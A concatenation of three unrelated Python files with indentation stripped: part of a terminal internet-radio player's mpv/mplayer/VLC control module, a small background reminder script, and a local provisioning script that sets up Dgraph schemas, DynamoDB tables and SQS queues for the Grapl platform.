if self.oldUserInput['Volume'] != subsystemOut:
self.oldUserInput['Volume'] = subsystemOut
self.volume = ''.join(c for c in subsystemOut if c.isdigit())
# IMPORTANT: do this here, so that cvlc actual_volume
# gets updated in _format_volume_string
string_to_show = self._format_volume_string(subsystemOut) + self._format_title_string(self.oldUserInput['Title'])
if self.show_volume and self.oldUserInput['Title']:
self.outputStream.write(string_to_show, args[0])
self.threadUpdateTitle(args[0])
elif self._is_in_playback_token(subsystemOut):
if self.connection_timeout_thread is not None:
self.connection_timeout_thread.cancel()
if (logger.isEnabledFor(logging.INFO)):
logger.info('start of playback detected')
if self.outputStream.last_written_string.startswith('Connecting '):
new_input = self.outputStream.last_written_string.replace('Connecting to', 'Playing')
self.outputStream.write(new_input, args[0])
if self.oldUserInput['Title'] == '':
self.oldUserInput['Input'] = new_input
else:
self.oldUserInput['Title'] = new_input
self.playback_is_on = True
elif self._is_icy_entry(subsystemOut):
#logger.error("***** icy_entry")
title = self._format_title_string(subsystemOut)
if title[len(self.icy_title_prefix):].strip():
self.oldUserInput['Title'] = subsystemOut
# make sure title will not pop-up while Volume value is on
ok_to_display = False
if self.delay_thread is None:
ok_to_display = True
else:
if (not self.delay_thread.isAlive()):
ok_to_display = True
if ok_to_display:
string_to_show = self.title_prefix + title
self.outputStream.write(string_to_show, args[0])
else:
if (logger.isEnabledFor(logging.INFO)):
logger.info('Icy-Title is NOT valid')
else:
if self.oldUserInput['Title'] == '':
self.oldUserInput['Title'] = 'Connecting to: "{}"'.format(self.name)
self.outputStream.write(self.oldUserInput['Title'])
except:
has_error = True
if logger.isEnabledFor(logging.ERROR):
logger.error("Error in updateStatus thread.", exc_info=True)
return
if (logger.isEnabledFor(logging.INFO)):
logger.info("updateStatus thread stopped.")
def updateMPVStatus(self, *args):
if (logger.isEnabledFor(logging.INFO)):
logger.info("MPV updateStatus thread started.")
while True:
try:
sock = self._connect_to_socket(self.mpvsocket)
finally:
if sock:
break
if args[1]():
if (logger.isEnabledFor(logging.INFO)):
logger.info("MPV updateStatus thread stopped (no connection to socket).")
return
sleep(.25)
#if (logger.isEnabledFor(logging.INFO)):
# logger.info("MPV updateStatus thread connected to socket.")
self.oldUserInput['Title'] = 'Connecting to: "{}"'.format(self.name)
self.outputStream.write(self.oldUserInput['Title'], args[0])
# Send data
message = b'{ "command": ["observe_property", 1, "filtered_metadata"] }\n'
sock.sendall(message)
GET_TITLE = b'{ "command": ["get_property", "filtered-metadata"] }\n'
while True:
if args[1]():
break
try:
data = sock.recvmsg(4096)
if isinstance(data, tuple):
a_data = data[0]
else:
a_data = data
#logger.error('DE Received: "{!r}"'.format(a_data))
if a_data == b'' or args[1]():
break
if a_data:
if b'"icy-title":"' in a_data:
title = a_data.split(b'"icy-title":"')[1].split(b'"}')[0]
if title:
try:
self.oldUserInput['Title'] = 'Title: ' + title.decode(self._station_encoding, "replace")
except:
self.oldUserInput['Title'] = 'Title: ' + title.decode("utf-8", "replace")
string_to_show = self.title_prefix + self.oldUserInput['Title']
if args[1]():
break
self.outputStream.write(string_to_show, args[0])
else:
if (logger.isEnabledFor(logging.INFO)):
logger.info('Icy-Title is NOT valid')
else:
all_data = a_data.split(b'\n')
for n in all_data:
try:
d = json.loads(n)
if 'event' in d.keys():
if d['event'] == 'metadata-update':
sock.sendall(GET_TITLE)
elif d['event'] == 'playback-restart':
if self.connection_timeout_thread is not None:
self.connection_timeout_thread.cancel()
if (logger.isEnabledFor(logging.INFO)):
logger.info('start of playback detected')
if self.outputStream.last_written_string.startswith('Connecting '):
new_input = self.outputStream.last_written_string.replace('Connecting to', 'Playing')
self.outputStream.write(new_input, args[0])
if self.oldUserInput['Title'] == '':
self.oldUserInput['Input'] = new_input
else:
self.oldUserInput['Title'] = new_input
self.playback_is_on = True
except:
pass
finally:
pass
sock.close()
if (logger.isEnabledFor(logging.INFO)):
logger.info("MPV updateStatus thread stopped.")
def threadUpdateTitle(self, a_lock, delay=1):
if self.oldUserInput['Title'] != '':
if self.delay_thread is not None:
if self.delay_thread.isAlive():
self.delay_thread.cancel()
try:
self.delay_thread = threading.Timer(delay, self.updateTitle, [ self.outputStream, self.title_prefix + self._format_title_string(self.oldUserInput['Title']), a_lock ] )
self.delay_thread.start()
except:
if (logger.isEnabledFor(logging.DEBUG)):
logger.debug("delay thread start failed")
def updateTitle(self, *arg, **karg):
arg[0].write(arg[1], arg[2])
def _is_icy_entry(self, a_string):
#logger.error("**** a_string = {}".format(a_string))
for a_tokken in self.icy_tokkens:
if a_tokken in a_string:
return True
return False
def _format_title_string(self, title_string):
return self._title_string_format_text_tag(title_string)
def _title_string_format_text_tag(self, a_string):
i = a_string.find(' - text="')
if i == -1:
return a_string
else:
ret_string = a_string[:i]
text_string = a_string[i+9:]
final_text_string = text_string[:text_string.find('"')]
if ret_string == self.icy_title_prefix + final_text_string:
return ret_string
else:
return ret_string + ': "' + final_text_string + '"'
def _format_volume_string(self, volume_string):
return self._title_string_format_text_tag(volume_string)
def isPlaying(self):
return bool(self.process)
def play(self, name, streamUrl, encoding = ''):
""" use a multimedia player to play a stream """
self.close()
self.name = name
self.oldUserInput = {'Input': '', 'Volume': '', 'Title': ''}
self.muted = False
self.show_volume = True
self.title_prefix = ''
self.playback_is_on = False
self.outputStream.write('Station: "{}" - Opening connection...'.format(name), self.status_update_lock)
if logger.isEnabledFor(logging.INFO):
logger.info('Selected Station: "{}"'.format(name))
if encoding:
self._station_encoding = encoding
else:
self._station_encoding = 'utf-8'
opts = []
isPlayList = streamUrl.split("?")[0][-3:] in ['m3u', 'pls']
opts = self._buildStartOpts(streamUrl, isPlayList)
self.stop_mpv_status_update_thread = False
if self.PLAYER_CMD == "mpv" and version_info > (3, 0):
self.process = subprocess.Popen(opts, shell=False,
stdout=subprocess.DEVNULL,
stdin=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
t = threading.Thread(target=self.updateMPVStatus, args=(self.status_update_lock, lambda: self.stop_mpv_status_update_thread ))
else:
self.process = subprocess.Popen(opts, shell=False,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT)
t = threading.Thread(target=self.updateStatus, args=(self.status_update_lock, ))
t.start()
# start playback check timer thread
try:
self.connection_timeout_thread = threading.Timer(self.playback_timeout, self.playback_timeout_handler)
self.connection_timeout_thread.start()
except:
self.connection_timeout_thread = None
if (logger.isEnabledFor(logging.ERROR)):
logger.error("playback detection thread start failed")
if logger.isEnabledFor(logging.INFO):
logger.info("Player started")
def _sendCommand(self, command):
""" send keystroke command to player """
if(self.process is not None):
try:
if logger.isEnabledFor(logging.DEBUG):
logger.debug("Command: {}".format(command).strip())
self.process.stdin.write(command.encode('utf-8', 'replace'))
self.process.stdin.flush()
except:
msg = "Error when sending: {}"
if logger.isEnabledFor(logging.ERROR):
logger.error(msg.format(command).strip(), exc_info=True)
def close(self):
""" exit pyradio (and kill player instance) """
self._no_mute_on_stop_playback()
# First close the subprocess
self._stop()
# Here is fallback solution and cleanup
if self.connection_timeout_thread is not None:
self.connection_timeout_thread.cancel()
if self.delay_thread is not None:
self.delay_thread.cancel()
if self.process is not None:
if platform.startswith('win'):
try:
#subprocess.check_output("Taskkill /PID %d /F" % self.process.pid)
#subprocess.Popen(["Taskkill", "/PID", "{}".format(self.process.pid), "/F"])
subprocess.Call(['Taskkill', '/PID', '{}'.format(self.process.pid), '/F'])
except:
pass
else:
try:
os.kill(self.process.pid, 15)
self.process.wait()
except ProcessLookupError:
# except:
pass
self.process = None
def _buildStartOpts(self, streamUrl, playList):
pass
def toggleMute(self):
""" mute / unmute player """
if self.PLAYER_CMD == 'mpv':
self.muted = self._mute()
else:
self.muted = not self.muted
self._mute()
if self.muted:
if self.delay_thread is not None:
self.delay_thread.cancel()
self.title_prefix = '[Muted] '
self.show_volume = False
else:
self.title_prefix = ''
self.show_volume = True
if self.oldUserInput['Title'] == '':
self.outputStream.write(self.title_prefix + self._format_title_string(self.oldUserInput['Input']))
else:
self.outputStream.write(self.title_prefix + self._format_title_string(self.oldUserInput['Title']))
def _mute(self):
""" to be implemented on subclasses """
pass
def _stop(self):
pass
def _get_volume(self):
""" get volume, if player can report it """
pass
def volumeUp(self):
""" increase volume """
if self.muted is not True:
self._volume_up()
def _volume_up(self):
""" to be implemented on subclasses """
pass
def volumeDown(self):
""" decrease volume """
if self.muted is not True:
self._volume_down()
def _volume_down(self):
""" to be implemented on subclasses """
pass
def _no_mute_on_stop_playback(self):
""" make sure player does not stop muted, i.e. volume=0
Currently implemented for vlc only."""
pass
def _is_accepted_input(self, input_string):
""" subclasses are able to reject input messages
thus limiting message procesing.
By default, all messages are accepted.
Currently implemented for vlc only."""
return True
class MpvPlayer(Player):
"""Implementation of Player object for MPV"""
PLAYER_CMD = "mpv"
""" items of this tupple are considered icy-title
and get displayed after first icy-title is received """
icy_tokkens = ('icy-title: ', )
""" USE_PROFILE
-1 : not checked yet
0 : do not use
1 : use profile"""
USE_PROFILE = -1
""" True if profile comes from ~/.config/mpv/mpv.conf """
PROFILE_FROM_USER = False
""" String to denote volume change """
volume_string = 'Volume: '
config_files = [expanduser("~") + "/.config/mpv/mpv.conf"]
if platform.startswith('darwin'):
config_files.append("/usr/local/etc/mpv/mpv.conf")
elif platform.startswith('win'):
config_files[0] = os.path.join(os.getenv('APPDATA'), "mpv", "mpv.conf")
else:
# linux, freebsd, etc.
config_files.append("/etc/mpv/mpv.conf")
mpvsocket = '/tmp/mpvsocket.{}'.format(os.getpid())
if logger.isEnabledFor(logging.DEBUG):
logger.debug('mpv socket is "{}"'.format(self.mpvsocket))
if os.path.exists(mpvsocket):
os.system("rm " + mpvsocket + " 2>/dev/null");
commands = {
'volume_up': b'{ "command": ["cycle", "volume", "up"] }\n',
'volume_down': b'{ "command": ["cycle", "volume", "down"] }\n',
'mute': b'{ "command": ["cycle", "mute"] }\n',
'pause': b'{ "command": ["pause"] }\n',
'quit': b'{ "command": ["quit"]}\n',
}
def save_volume(self):
""" Saving Volume in Windows does not work;
Profiles not supported... """
if int(self.volume) > 999:
self.volume = -2
return self._do_save_volume("[pyradio]\nvolume={}\n")
def _configHasProfile(self):
""" Checks if mpv config has [pyradio] entry / profile.
Profile example:
[pyradio]
volume-max=300
volume=50"""
for i, config_file in enumerate(self.config_files):
if os.path.exists(config_file):
with open(config_file) as f:
config_string = f.read()
if "[pyradio]" in config_string:
if i == 0:
self.PROFILE_FROM_USER = True
return 1
return 0
def _buildStartOpts(self, streamUrl, playList=False):
""" Builds the options to pass to subprocess."""
""" Test for newer MPV versions as it supports different IPC flags. """
p = subprocess.Popen([self.PLAYER_CMD, "--input-ipc-server"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=False)
out = p.communicate()
if "not found" not in str(out[0]):
if logger.isEnabledFor(logging.DEBUG):
logger.debug("--input-ipc-server is supported.")
newerMpv = 1;
else:
if logger.isEnabledFor(logging.DEBUG):
logger.debug("--input-ipc-server is not supported.")
newerMpv = 0;
http_url = streamUrl.replace('https://', 'http://')
if playList:
if newerMpv:
opts = [self.PLAYER_CMD, "--quiet", "--playlist=" + http_url, "--input-ipc-server=" + self.mpvsocket]
else:
opts = [self.PLAYER_CMD, "--quiet", "--playlist=" + http_url, "--input-unix-socket=" + self.mpvsocket]
else:
if newerMpv:
opts = [self.PLAYER_CMD, "--quiet", http_url, "--input-ipc-server=" + self.mpvsocket]
else:
opts = [self.PLAYER_CMD, "--quiet", http_url, "--input-unix-socket=" + self.mpvsocket]
if self.USE_PROFILE == -1:
self.USE_PROFILE = self._configHasProfile()
if self.USE_PROFILE == 1:
opts.append("--profile=pyradio")
if (logger.isEnabledFor(logging.DEBUG)):
logger.debug("using profile [pyradio]")
return opts
def _mute(self):
""" mute mpv """
ret = self._send_mpv_command('mute')
while not ret:
ret = self._send_mpv_command('mute')
return self._get_mute_status()
def _get_mute_status(self):
got_it = True
while True:
sock = self._connect_to_socket(self.mpvsocket)
sock.sendall(b'{ "command": ["get_property", "mute"] }\n')
# wait for response
try:
if version_info < (3, 0):
data = sock.recv(4096)
else:
data = sock.recvmsg(4096)
if isinstance(data, tuple):
a_data = data[0]
else:
a_data = data
#logger.error('DE Received: "{!r}"'.format(a_data))
if a_data:
all_data = a_data.split(b'\n')
for n in all_data:
try:
d = json.loads(n)
if d['error'] == 'success':
if isinstance(d['data'], bool):
sock.close()
return d['data']
except:
pass
finally:
pass
def pause(self):
""" pause streaming (if possible) """
self._send_mpv_command('pause')
def _stop(self):
""" exit pyradio (and kill mpv instance) """
self.stop_mpv_status_update_thread = True
self._send_mpv_command('quit')
os.system("rm " + self.mpvsocket + " 2>/dev/null");
def _volume_up(self):
""" increase mpv's volume """
self._send_mpv_command('volume_up')
self._display_mpv_volume_value()
def _volume_down(self):
""" decrease mpv's volume """
self._send_mpv_command('volume_down')
self._display_mpv_volume_value()
def _format_title_string(self, title_string):
""" format mpv's title """
return self._title_string_format_text_tag(title_string.replace(self.icy_tokkens[0], self.icy_title_prefix))
def _format_volume_string(self, volume_string):
""" format mpv's volume """
return '[' + volume_string[volume_string.find(self.volume_string):].replace('ume', '')+'] '
def _connect_to_socket(self, server_address):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(server_address)
return sock
except socket.error as err:
sock.close()
return None
def _send_mpv_command(self, a_command):
""" Send a command to MPV
"""
if a_command in self.commands.keys():
#while True:
# sock = self._connect_to_socket(self.mpvsocket)
# if sock:
# break
# sleep(.25)
sock = self._connect_to_socket(self.mpvsocket)
if sock is None:
return False
# Send data
sock.sendall(self.commands[a_command])
# read the responce
if version_info < (3, 0):
data = sock.recv(4096)
else:
data = sock.recvmsg(4096)
#logger.error('DE data = "{}"'.format(data))
sock.close()
return True
def _display_mpv_volume_value(self):
""" Display volume for MPV
Currently working with python 2 and 3
Eventually will be used for python 2 only
Python 2 cannot correctly read icy-title from
the socket (unidoce issue), so it has to read
it from stdout.
"""
#if version_info > (3, 0):
# return
vol = 0
while True:
sock = self._connect_to_socket(self.mpvsocket)
if sock:
break
sleep(.25)
# Send data
message = b'{ "command": ["get_property", "volume"] }\n'
sock.sendall(message)
# wait for response
got_it = True
while got_it:
try:
if version_info < (3, 0):
data = sock.recv(4096)
else:
data = sock.recvmsg(4096)
if isinstance(data, tuple):
a_data = data[0]
else:
a_data = data
#logger.error('DE Received: "{!r}"'.format(a_data))
if a_data == b'':
break
if data:
all_data = a_data.split(b'\n')
for n in all_data:
try:
d = json.loads(n)
if d['error'] == 'success':
try:
vol = int(d['data'])
got_it = False
break
except:
pass
except:
pass
finally:
pass
sock.close()
if self.oldUserInput['Title']:
info_string = self._format_title_string(self.oldUserInput['Title'])
else:
info_string = self._format_title_string(self.oldUserInput['Input'])
string_to_show = self._format_volume_string('Volume: ' + str(vol) + '%') + info_string
self.outputStream.write(string_to_show)
self.threadUpdateTitle(self.status_update_lock)
self.volume = vol
class MpPlayer(Player):
"""Implementation of Player object for MPlayer"""
PLAYER_CMD = "mplayer"
""" items of this tupple are considered icy-title
and get displayed after first icy-title is received """
icy_tokkens = ('ICY Info:', )
""" USE_PROFILE
-1 : not checked yet
0 : do not use
1 : use profile"""
USE_PROFILE = -1
""" True if profile comes from ~/.mplayer/config """
PROFILE_FROM_USER = False
""" String to denote volume change """
volume_string = 'Volume: '
config_files = [expanduser("~") + "/.mplayer/config"]
if platform.startswith('darwin'):
config_files.append("/usr/local/etc/mplayer/mplayer.conf")
elif platform.startswith('win'):
if os.path.exists('C:\\mplayer\\mplayer.exe'):
config_files[0] = 'C:\\mplayer\mplayer\\config'
elif os.path.exists(os.path.join(os.getenv('USERPROFILE'), "mplayer", "mplayer.exe")):
config_files[0] = os.path.join(os.getenv('USERPROFILE'), "mplayer", "mplayer", "config")
elif os.path.exists(os.path.join(os.getenv('APPDATA'), "pyradio", "mplayer", "mplayer.exe")):
config_files[0] = os.path.join(os.getenv('APPDATA'), "pyradio", "mplayer", "mplayer", "config")
else:
config_files = []
else:
# linux, freebsd, etc.
config_files.append("/etc/mplayer/mplayer.conf")
def save_volume(self):
if platform.startswith('win'):
return self._do_save_volume("volume={}\r\n")
return 0
return self._do_save_volume("[pyradio]\nvolstep=1\nvolume={}\n")
def _configHasProfile(self):
""" Checks if mplayer config has [pyradio] entry / profile.
Profile example:
[pyradio]
volstep=2
volume=28"""
""" Existing mplayer Windows implementations do not support profiles """
if platform.startswith('win'):
return 0
for i, config_file in enumerate(self.config_files):
if os.path.exists(config_file):
with open(config_file) as f:
config_string = f.read()
if "[pyradio]" in config_string:
if i == 0:
self.PROFILE_FROM_USER = True
return 1
return 0
def _buildStartOpts(self, streamUrl, playList=False):
""" Builds the options to pass to subprocess."""
http_url = streamUrl.replace('https://', 'http://')
if playList:
opts = [self.PLAYER_CMD, "-quiet", "-playlist", http_url]
else:
opts = [self.PLAYER_CMD, "-quiet", http_url]
if self.USE_PROFILE == -1:
self.USE_PROFILE = self._configHasProfile()
if self.USE_PROFILE == 1:
opts.append("-profile")
opts.append("pyradio")
if (logger.isEnabledFor(logging.DEBUG)):
logger.debug("using profile [pyradio]")
return opts
def _mute(self):
""" mute mplayer """
self._sendCommand("m")
def pause(self):
""" pause streaming (if possible) """
self._sendCommand("p")
def _stop(self):
""" exit pyradio (and kill mplayer instance) """
self._sendCommand("q")
def _volume_up(self):
""" increase mplayer's volume """
self._sendCommand("*")
def _volume_down(self):
""" decrease mplayer's volume """
self._sendCommand("/")
def _format_title_string(self, title_string):
""" format mplayer's title """
if "StreamTitle='" in title_string:
tmp = title_string[title_string.find("StreamTitle='"):].replace("StreamTitle='", self.icy_title_prefix)
ret_string = tmp[:tmp.find("';")]
else:
ret_string = title_string
if '"artist":"' in ret_string:
""" work on format:
ICY Info: START_SONG='{"artist":"Clelia Cafiero","title":"M. Mussorgsky-Quadri di un'esposizione"}';
Fund on "ClassicaViva Web Radio: Classical"
"""
ret_string = self.icy_title_prefix + ret_string[ret_string.find('"artist":')+10:].replace('","title":"', ' - ').replace('"}\';', '')
return self._title_string_format_text_tag(ret_string)
def _format_volume_string(self, volume_string):
""" format mplayer's volume """
return '[' + volume_string[volume_string.find(self.volume_string):].replace(' %','%').replace('ume', '')+'] '
class VlcPlayer(Player):
"""Implementation of Player for VLC"""
PLAYER_CMD = "cvlc"
""" items of this tupple are considered icy-title
and get displayed after first icy-title is received """
icy_tokkens = ('New Icy-Title=', )
muted = False
""" String to denote volume change """
volume_string = '( audio volume: '
""" vlc reports volume in values 0..512 """
actual_volume = -1
max_volume = 512
""" When found in station transmission, playback is on """
_playback_token_tuple = ('Content-Type: audio', )
def save_volume(self):
pass
def _buildStartOpts(self, streamUrl, playList=False):
""" Builds the options to pass to subprocess."""
#opts = [self.PLAYER_CMD, "-Irc", "--quiet", streamUrl]
opts = [self.PLAYER_CMD, "-Irc", "-vv", streamUrl.replace('https://', 'http://')]
return opts
def _mute(self):
""" mute vlc """
if self.muted:
self._sendCommand("volume {}\n".format(self.actual_volume))
if logger.isEnabledFor(logging.DEBUG):
logger.debug('VLC unmuted: {0} ({1}%)'.format(self.actual_volume, int(100 * self.actual_volume / self.max_volume)))
else:
if self.actual_volume == -1:
self._get_volume()
self._sendCommand("volume 0\n")
if logger.isEnabledFor(logging.DEBUG):
logger.debug('VLC muted: 0 (0%)')
def pause(self):
""" pause streaming (if possible) """
self._sendCommand("stop\n")
def _stop(self):
""" exit pyradio (and kill vlc instance) """
if self.ctrl_c_pressed:
return
self._sendCommand("shutdown\n")
def _volume_up(self):
""" increase vlc's volume """
self._sendCommand("volup\n")
def _volume_down(self):
""" decrease vlc's volume """
self._sendCommand("voldown\n")
def _format_volume_string(self, volume_string):
""" format vlc's volume """
dec_sep = '.' if '.' in volume_string else ','
self.actual_volume = int(volume_string.split(self.volume_string)[1].split(dec_sep)[0].split()[0])
return '[Vol: {}%] '.format(int(100 * self.actual_volume / self.max_volume))
def _format_title_string(self, title_string):
""" format vlc's title """
sp = title_string.split(self.icy_tokkens[0])
if sp[0] == title_string:
ret_string = title_string
else:
ret_string = self.icy_title_prefix + sp[1]
return self._title_string_format_text_tag(ret_string)
def _is_accepted_input(self, input_string):
""" vlc input filtering """
ret = False
accept_filter = (self.volume_string, "http stream debug: ")
reject_filter = ()
for n in accept_filter:
if n in input_string:
ret = True
break
if ret:
for n in reject_filter:
if n in input_string:
ret = False
break
return ret
def _get_volume(self):
""" get vlc's actual_volume"""
self.show_volume = False
self._sendCommand("voldown 0\n")
def _no_mute_on_stop_playback(self):
""" make sure vlc does not stop muted """
if self.ctrl_c_pressed:
return
if self.isPlaying():
if self.actual_volume == -1:
self._get_volume()
while self.actual_volume == -1:
pass
if self.actual_volume == 0:
self.actual_volume = int(self.max_volume*0.25)
self._sendCommand('volume {}\n'.format(self.actual_volume))
if logger.isEnabledFor(logging.DEBUG):
logger.debug('Unmuting VLC on exit: {} (25%)'.format(self.actual_volume))
elif self.muted:
if self.actual_volume > 0:
self._sendCommand('volume {}\n'.format(self.actual_volume))
if logger.isEnabledFor(logging.DEBUG):
logger.debug('VLC volume restored on exit: {0} ({1}%)'.format(self.actual_volume, int(100 * self.actual_volume / self.max_volume)))
self.show_volume = True
def probePlayer(requested_player=''):
""" Probes the multimedia players which are available on the host
system."""
ret_player = None
if logger.isEnabledFor(logging.INFO):
logger.info("Probing available multimedia players...")
implementedPlayers = Player.__subclasses__()
if logger.isEnabledFor(logging.INFO):
logger.info("Implemented players: " +
", ".join([player.PLAYER_CMD
for player in implementedPlayers]))
if requested_player:
req = requested_player.split(',')
for r_player in req:
if r_player == 'vlc':
r_player = 'cvlc'
for player in implementedPlayers:
if player.PLAYER_CMD == r_player:
ret_player = check_player(player)
if ret_player is not None:
return ret_player
if ret_player is None:
if logger.isEnabledFor(logging.INFO):
logger.info('Requested player "{}" not supported'.format(r_player))
else:
for player in implementedPlayers:
ret_player = check_player(player)
if ret_player is not None:
break
return ret_player
def check_player(a_player):
try:
p = subprocess.Popen([a_player.PLAYER_CMD, "--help"],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
shell=False)
p.terminate()
if logger.isEnabledFor(logging.INFO):
logger.info("{} supported.".format(str(a_player)))
return a_player
except OSError:
if logger.isEnabledFor(logging.DEBUG):
logger.debug("{} not supported.".format(str(a_player)))
return None
|
kilg.py | import time, os
from multiprocessing import Process
# This is a OS-specific call, it looks confusing but:
# 1. "os.name" is a variable that determines the type of OS
# that Python is currently operating inside of. "nt" = "windows",
# else means another platform, e.g. MAC + LINUX.
# 2. We use the "clear" or "cls" terminal command to
# clear the screen depending on the platform,
# "clear" in mac/linux clears the terminal, and
# "cls" clears the terminal for windows.
# 3. "os.system" calls a system function/ in the terminal
# as if we called it.
def clear():
os.system("cls" if os.name == "nt" else "clear")
# The actual "waiting" part of the function, this is
# shipped off into another process behind the scenes
# and only interupts our execution flow when the function
# finishes and .start() is called on the process that contains
# this target. e.g. Process(target=wait_real, args=[length, texta])
# - calling .start() will start the exec and print ahead when required.
# 1. Sleep for desired time
# 2. Clear the screen after sleep has finished
# 3. Print out the data that is desired to be printed
# 4. Leave the message up for 10 seconds
def wait_real(length, texta):
time.sleep(length)
clear()
print("ALERT!: {0}".format(texta))
time.sleep(10)
# Establishing the processes each time the user specifies
# on the infinite loop while loop. Simply starts and targets
# the wait_real function and causes it to start execution and
# the waiting part of the function.
def wait_session(length, texta):
p = Process(target=wait_real, args=[length, texta])
p.start()
# Iterating infintely and adding a process in the background
# that will disrupt the infinite loop each time that there is
# a trigger to do so.
while True:
clear()
# I/O blocking till we go through both of them
reminder = input("Your note: ")
length = int(input("Length: "))
wait_session(length, reminder)
print("Setup to remind you in the background!")
|
grapl_provision.py | import json
import os
import logging
import sys
import threading
import time
from hashlib import sha256, pbkdf2_hmac
from typing import List
from uuid import uuid4
import boto3
import botocore
import pydgraph
from grapl_analyzerlib.grapl_client import MasterGraphClient, GraphClient
from grapl_analyzerlib.node_types import (
EdgeRelationship,
PropPrimitive,
PropType,
EdgeT,
)
from grapl_analyzerlib.nodes.base import BaseSchema
from grapl_analyzerlib.prelude import (
AssetSchema,
ProcessSchema,
FileSchema,
IpConnectionSchema,
IpAddressSchema,
IpPortSchema,
NetworkConnectionSchema,
ProcessInboundConnectionSchema,
ProcessOutboundConnectionSchema,
LensSchema,
RiskSchema,
)
from grapl_analyzerlib.schema import Schema
GRAPL_LOG_LEVEL = os.getenv("GRAPL_LOG_LEVEL")
LEVEL = "ERROR" if GRAPL_LOG_LEVEL is None else GRAPL_LOG_LEVEL
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(LEVEL)
LOGGER.addHandler(logging.StreamHandler(stream=sys.stdout))
def create_secret(secretsmanager):
secretsmanager.create_secret(
Name="JWT_SECRET_ID",
SecretString=str(uuid4()),
)
def set_schema(client, schema) -> None:
op = pydgraph.Operation(schema=schema)
client.alter(op)
def drop_all(client) -> None:
op = pydgraph.Operation(drop_all=True)
client.alter(op)
def format_schemas(schema_defs: List["BaseSchema"]) -> str:
schemas = "\n\n".join([schema.generate_schema() for schema in schema_defs])
types = "\n\n".join([schema.generate_type() for schema in schema_defs])
return "\n".join(
[" # Type Definitions", types, "\n # Schema Definitions", schemas]
)
def query_dgraph_predicate(client: "GraphClient", predicate_name: str):
query = f"""
schema(pred: {predicate_name}) {{ }}
"""
txn = client.txn(read_only=True)
try:
res = json.loads(txn.query(query).json)["schema"][0]
finally:
txn.discard()
return res
def meta_into_edge(schema, predicate_meta):
if predicate_meta.get("list"):
return EdgeT(type(schema), BaseSchema, EdgeRelationship.OneToMany)
else:
return EdgeT(type(schema), BaseSchema, EdgeRelationship.OneToOne)
def meta_into_property(schema, predicate_meta):
is_set = predicate_meta.get("list")
type_name = predicate_meta["type"]
primitive = None
if type_name == "string":
primitive = PropPrimitive.Str
if type_name == "int":
primitive = PropPrimitive.Int
if type_name == "bool":
primitive = PropPrimitive.Bool
return PropType(primitive, is_set, index=predicate_meta.get("index", []))
def meta_into_predicate(schema, predicate_meta):
try:
if predicate_meta["type"] == "uid":
return meta_into_edge(schema, predicate_meta)
else:
return meta_into_property(schema, predicate_meta)
except Exception as e:
LOGGER.error(f"Failed to convert meta to predicate: {predicate_meta} {e}")
raise e
def query_dgraph_type(client: "GraphClient", type_name: str):
query = f"""
schema(type: {type_name}) {{ type }}
"""
txn = client.txn(read_only=True)
try:
res = json.loads(txn.query(query).json)
finally:
txn.discard()
if not res:
return []
if not res.get("types"):
return []
res = res["types"][0]["fields"]
predicate_names = []
for pred in res:
predicate_names.append(pred["name"])
predicate_metas = []
for predicate_name in predicate_names:
predicate_metas.append(query_dgraph_predicate(client, predicate_name))
return predicate_metas
def extend_schema(graph_client: GraphClient, schema: "BaseSchema"):
predicate_metas = query_dgraph_type(graph_client, schema.self_type())
for predicate_meta in predicate_metas:
predicate = meta_into_predicate(schema, predicate_meta)
if isinstance(predicate, PropType):
schema.add_property(predicate_meta["predicate"], predicate)
else:
schema.add_edge(predicate_meta["predicate"], predicate, "")
def provision_master_graph(
master_graph_client: GraphClient, schemas: List["BaseSchema"]
) -> None:
mg_schema_str = format_schemas(schemas)
set_schema(master_graph_client, mg_schema_str)
def store_schema(table, schema: "Schema"):
for f_edge, (_, r_edge) in schema.get_edges().items():
if not (f_edge and r_edge):
continue
table.put_item(Item={"f_edge": f_edge, "r_edge": r_edge})
table.put_item(Item={"f_edge": r_edge, "r_edge": f_edge})
print(f"stored edge mapping: {f_edge} {r_edge}")
def provision_mg(mclient) -> None:
# drop_all(mclient)
schemas = (
AssetSchema(),
ProcessSchema(),
FileSchema(),
IpConnectionSchema(),
IpAddressSchema(),
IpPortSchema(),
NetworkConnectionSchema(),
ProcessInboundConnectionSchema(),
ProcessOutboundConnectionSchema(),
RiskSchema(),
LensSchema(),
)
for schema in schemas:
schema.init_reverse()
for schema in schemas:
extend_schema(mclient, schema)
provision_master_graph(mclient, schemas)
dynamodb = boto3.resource(
"dynamodb",
region_name="us-west-2",
endpoint_url="http://dynamodb:8000",
aws_access_key_id="dummy_cred_aws_access_key_id",
aws_secret_access_key="dummy_cred_aws_secret_access_key",
)
table = dynamodb.Table("local-grapl-grapl_schema_table")
for schema in schemas:
store_schema(table, schema)
BUCKET_PREFIX = "local-grapl"
services = (
"sysmon-graph-generator",
"generic-graph-generator",
"node-identifier",
"graph-merger",
"analyzer-dispatcher",
"analyzer-executor",
"engagement-creator",
)
buckets = (
BUCKET_PREFIX + "-sysmon-log-bucket",
BUCKET_PREFIX + "-unid-subgraphs-generated-bucket",
BUCKET_PREFIX + "-subgraphs-generated-bucket",
BUCKET_PREFIX + "-subgraphs-merged-bucket",
BUCKET_PREFIX + "-analyzer-dispatched-bucket",
BUCKET_PREFIX + "-analyzers-bucket",
BUCKET_PREFIX + "-analyzer-matched-subgraphs-bucket",
BUCKET_PREFIX + "-model-plugins-bucket",
)
def provision_sqs(sqs, service_name: str) -> None:
redrive_queue = sqs.create_queue(
QueueName="grapl-%s-retry-queue" % service_name,
Attributes={"MessageRetentionPeriod": "86400"},
)
redrive_url = redrive_queue["QueueUrl"]
LOGGER.debug(f"Provisioned {service_name} retry queue at " + redrive_url)
redrive_arn = sqs.get_queue_attributes(
QueueUrl=redrive_url, AttributeNames=["QueueArn"]
)["Attributes"]["QueueArn"]
redrive_policy = {
"deadLetterTargetArn": redrive_arn,
"maxReceiveCount": "10",
}
queue = sqs.create_queue(
QueueName="grapl-%s-queue" % service_name,
)
sqs.set_queue_attributes(
QueueUrl=queue["QueueUrl"],
Attributes={"RedrivePolicy": json.dumps(redrive_policy)},
)
LOGGER.debug(f"Provisioned {service_name} queue at " + queue["QueueUrl"])
sqs.purge_queue(QueueUrl=queue["QueueUrl"])
